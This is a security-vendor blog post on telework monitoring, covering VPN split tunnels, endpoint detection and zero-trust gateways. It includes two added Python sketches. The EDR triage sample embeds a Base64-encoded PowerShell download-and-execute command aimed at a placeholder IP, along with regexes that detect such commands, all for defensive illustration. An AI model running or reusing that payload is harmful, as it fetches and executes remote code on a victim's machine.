by Paul Caiazzo
Many organizations’ security monitoring infrastructure is built on the assumption that most employees connect directly to the corporate LAN. By collecting data from Active Directory domain controllers, the perimeter firewall, server and workstation event logs, endpoint protection logs, and other key on-premises data sources, an organization can maintain a high level of visibility into activity within its network.
However, employees are increasingly working outside the network perimeter, whether on mobile devices or from home or another remote environment. Support for telework was growing steadily in recent years, but the COVID-19 pandemic drove a sudden surge in work from home. As a result, many organizations have lost visibility into a large percentage of their business network traffic.
Cybercriminals have pounced on the chance to exploit the resulting distraction by turning up the volume of their efforts. Bad actors have recently made news by stealing personal data from unemployment benefit applicants in several states, waging ongoing COVID-19-themed phishing campaigns, and driving a reported 238% surge in cyberattacks against banks.
With so much at stake, it’s important to establish ways of monitoring telework security in a world with disappearing network perimeters.
Related Reading: Gauging Risk Tolerance for Remote Workforce Security Versus Privacy
With a fully remote workforce, many organizations have been forced to choose between usability and security. Existing virtual private network (VPN) infrastructure was not designed to carry the traffic of a fully remote workforce.
Split-tunnel VPNs have been widely recommended as the fix for this scalability problem: only traffic destined for corporate resources is sent through the tunnel, while Internet-bound traffic flows directly from the employee’s device to its destination. This improves usability and relieves the VPN concentrators, but it does so at the cost of security and network visibility, because the traffic that bypasses the tunnel also bypasses the perimeter firewall and the on-premises monitoring behind it.
Cybercriminals are capitalizing on this opportunity. The United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom’s National Cyber Security Centre (NCSC) recently issued a joint alert noting an increase in cyberattacks exploiting VPN vulnerabilities.
With unmonitored connections to the public Internet, a remote worker’s laptop can be compromised by malware or an attacker without detection. The compromised device can then be used as a stepping stone into the corporate environment over its VPN connection. For a remote workforce, employee devices and home networks are the new corporate network edge.
With the network perimeter shifted to teleworkers’ devices, securing the enterprise requires shifting security to these devices as well. Organizations require at least the same level of visibility into activity as they have on the corporate network.
By deploying agents onto the corporate-owned devices used by teleworkers, an organization can implement endpoint detection and response beyond the confines of the corporate network. This includes the ability to prevent and detect malware, viruses, ransomware, and other threats based upon signature analysis and behavioral analysis of potentially malicious processes.
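To make the two detection approaches concrete, here is an added example (not Avertium’s code and not any vendor’s agent) of the kind of triage an EDR agent performs on process-creation telemetry. A signature check compares the new process’s hash against a known-bad list, and two behavioral rules flag an Office application spawning a script host and PowerShell launched with a Base64-encoded command. The events, the placeholder hash, and the rule thresholds are all constructed for this illustration.

```python
"""Minimal EDR-style triage over process-creation telemetry.

Added example, not code from the original article or any EDR product.
The events, the known-bad hash, and the rules are constructed placeholders.
"""
import base64
import re
from dataclasses import dataclass

# Constructed "signature" table. A real agent pulls these from the vendor
# cloud; this value is a placeholder, not a real indicator.
KNOWN_BAD_SHA256 = {"1" * 64}

# Behavioral rule 1: document handlers should never spawn a script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Behavioral rule 2: PowerShell started with -e / -ec / -enc / -EncodedCommand.
ENCODED_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
DOWNLOAD_EXEC = re.compile(r"(?i)downloadstring|invoke-expression|\biex\b")


@dataclass
class ProcessEvent:
    host: str
    user: str
    parent: str
    image: str
    cmdline: str
    sha256: str


def decode_encoded_command(cmdline):
    """Return the decoded UTF-16LE payload of an encoded command, or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event):
    """Return (rule, severity, detail) findings for a single event."""
    findings = []
    if event.sha256.lower() in KNOWN_BAD_SHA256:
        findings.append(("signature.known_bad_hash", "high", event.sha256))
    if (event.parent.lower() in OFFICE_PARENTS
            and event.image.lower() in SCRIPT_HOSTS):
        findings.append(("behavior.office_spawns_script_host", "high",
                         f"{event.parent} -> {event.image}"))
    decoded = decode_encoded_command(event.cmdline)
    if decoded is not None:
        # Encoded commands are common in admin scripts; a download-and-run
        # pattern inside the payload is what pushes it to high severity.
        severity = "high" if DOWNLOAD_EXEC.search(decoded) else "medium"
        findings.append(("behavior.encoded_powershell", severity, decoded))
    return findings


def analyze(events):
    """Run triage over a batch and return alerts tagged with host and user."""
    alerts = []
    for ev in events:
        for rule, severity, detail in triage(ev):
            alerts.append({"host": ev.host, "user": ev.user, "rule": rule,
                           "severity": severity, "detail": detail})
    return alerts


def build_sample_events():
    """Constructed telemetry: one benign event and two that should fire."""
    payload = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')"
    encoded = base64.b64encode(payload.encode("utf-16-le")).decode()
    return [
        ProcessEvent("LAPTOP-01", "jdoe", "explorer.exe", "chrome.exe",
                     "chrome.exe", "a" * 64),
        ProcessEvent("LAPTOP-01", "jdoe", "winword.exe", "powershell.exe",
                     f"powershell.exe -nop -w hidden -enc {encoded}", "b" * 64),
        ProcessEvent("LAPTOP-02", "asmith", "explorer.exe", "update.exe",
                     "update.exe", "1" * 64),
    ]


if __name__ == "__main__":
    for alert in analyze(build_sample_events()):
        print(alert)
```

The Word-to-PowerShell event trips both behavioral rules even though its binary hash is clean, which is the point of pairing behavioral analysis with signatures: the agent does not need to have seen the specific malware before to catch the delivery technique.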
However, an organization also requires centralized visibility into the devices of its remote workforce. For this purpose, a centrally managed cloud-based solution is the ideal choice. By moving security to the cloud, an enterprise reduces the load on the corporate network and VPN infrastructure, especially in a split-tunnel connectivity architecture. Cloud-based monitoring and threat management can also achieve a higher level of scalability and performance than an on-premises solution.
A cloud-based zero trust platform can also act as an access broker for resources on both the public Internet and the corporate private network. Zero trust agents installed on telecommuters’ devices can securely and dynamically route all traffic to a cloud-based gateway and then on to the target resource, providing the same or better control and visibility than even a well-configured traditional full-tunnel VPN.
By uniquely identifying the user, device, and context of each request, a zero trust network (ZTN) gives the enterprise fine-grained access control. Data from the cloud-based ZTN gateway can additionally feed behavioral analytics in a cloud-based SIEM platform, enhancing security visibility beyond what traditional networking approaches offer.
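The following is an added example (not Avertium’s code or any zero trust product’s policy engine) of how a cloud gateway can turn user, device, and context signals into an access decision and a structured record for the SIEM. The posture fields, the risk weights, the thresholds, and the `.corp.internal` naming for private resources are assumptions chosen for the illustration; the one rule taken from the text is that a device whose endpoint agent reports trouble gets nothing brokered at all.

```python
"""Zero-trust access broker: user + device + context -> decision + SIEM event.

Added example, not code from the original article or any ZTN vendor.
The posture fields, weights, thresholds and domain names are assumptions.
"""
import json
from dataclasses import dataclass
from datetime import datetime, timezone


@dataclass
class DevicePosture:
    device_id: str
    managed: bool           # enrolled corporate device with the agent installed
    edr_healthy: bool       # agent reporting in, no open high-severity alerts
    disk_encrypted: bool
    os_patch_age_days: int


@dataclass
class AccessRequest:
    user: str
    mfa_verified: bool
    device: DevicePosture
    resource: str           # e.g. "hr-portal.corp.internal" or "www.example.com"
    country: str            # geolocation of the client connection
    hour_utc: int


PRIVATE_SUFFIX = ".corp.internal"   # assumed naming for corporate resources
ALLOWED_COUNTRIES = {"US", "CA"}    # assumed normal working locations


def is_private_resource(resource):
    return resource.endswith(PRIVATE_SUFFIX)


def risk_score(req):
    """Accumulate risk from identity, device and context signals."""
    signals = [
        (not req.mfa_verified, 40, "no_mfa"),
        (not req.device.managed, 30, "unmanaged_device"),
        (not req.device.edr_healthy, 50, "edr_unhealthy"),
        (not req.device.disk_encrypted, 20, "disk_unencrypted"),
        (req.device.os_patch_age_days > 30, 15, "stale_patches"),
        (req.country not in ALLOWED_COUNTRIES, 25, "unexpected_geo"),
        (req.hour_utc < 5 or req.hour_utc > 22, 10, "off_hours"),
    ]
    reasons = [name for hit, _, name in signals if hit]
    score = sum(weight for hit, weight, _ in signals if hit)
    return score, reasons


def decide(req):
    """Return (action, score, reasons) for a brokered request."""
    score, reasons = risk_score(req)
    if "edr_unhealthy" in reasons:
        action = "deny"     # a possibly compromised endpoint is brokered nowhere
    elif is_private_resource(req.resource):
        action = "allow" if score < 30 else "deny"   # corporate apps need clean posture
    else:
        action = "allow" if score < 60 else "deny"   # Internet traffic: lighter bar
    return action, score, reasons


def siem_event(req, action, score, reasons, now=None):
    """Structured record the ZTN gateway would ship to the cloud SIEM."""
    now = now or datetime.now(timezone.utc)
    return json.dumps({
        "ts": now.isoformat(),
        "user": req.user,
        "device_id": req.device.device_id,
        "resource": req.resource,
        "private": is_private_resource(req.resource),
        "action": action,
        "risk_score": score,
        "reasons": reasons,
    }, sort_keys=True)


if __name__ == "__main__":
    # Constructed requests: a clean corporate laptop, a BYOD phone, a sick laptop.
    clean = DevicePosture("LAPTOP-01", True, True, True, 3)
    byod = DevicePosture("PHONE-77", False, True, True, 3)
    sick = DevicePosture("LAPTOP-02", True, False, True, 3)
    for req in (
        AccessRequest("jdoe", True, clean, "hr-portal.corp.internal", "US", 14),
        AccessRequest("jdoe", True, byod, "hr-portal.corp.internal", "US", 14),
        AccessRequest("jdoe", True, byod, "www.example.com", "US", 14),
        AccessRequest("asmith", True, sick, "www.example.com", "US", 14),
    ):
        print(siem_event(req, *decide(req)))
```

Because every decision, allowed or denied, is emitted with the user, device, resource and the reasons behind the score, the SIEM can baseline normal behavior per user and device and alert on drift, which is the visibility a split-tunnel VPN gives up.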
Monitoring telework security can be a thorny issue for an organization from a privacy and security perspective. On one hand, an organization needs the ability to secure the sensitive data employees use for daily work in order to meet regulatory requirements. On the other, deploying network monitoring at employees’ homes raises significant privacy issues.
You can read about gauging privacy issues against risk appetite for your remote workforce here.
An agent-based solution, backed by cloud-based infrastructure, offers a workable answer to both concerns. For corporate-owned devices, company policy should include an explicit consent-to-monitor clause that allows the organization to monitor activity on company devices. Agents installed on those devices let the organization exercise that right without inappropriately monitoring activity on the employee’s personal devices connected to the same home network.
For personal devices used for remote work under a bring-your-own-device (BYOD) policy, the line between privacy and security is blurrier. Because the employee owns the device, it may be harder to require installation of the software agent, and these dual-use devices can lead to inadvertent corporate monitoring of personal traffic. Every organization with a BYOD model should document in policy the requirements for using personally owned devices, including the cloud-based anti-malware and endpoint detection and response (EDR) tools described earlier.
You can read more about writing policy and procedures for your new remote workforce here.
The most secure way to enable BYOD is a combination of corporately managed cloud-based anti-malware/EDR, supplemented by a ZTN architecture. In such a model, traffic bound for public Internet resources can be passed to its destination without interference, while malicious activity can still be detected and prevented.
Check out our webinar-on-demand, “Remote Workforce + Data Breach: A Perfect Storm”, to listen to legal, data privacy, and cybersecurity experts as they discuss how to adapt an Incident Response Plan for the remote workforce model so you can Show No Weakness.
Paul brings his wealth of cybersecurity experience to guide Avertium customers through challenging security problems while keeping business goals and objectives at the forefront. His primary focus is on business development, partner and client engagement, and other strategic initiatives.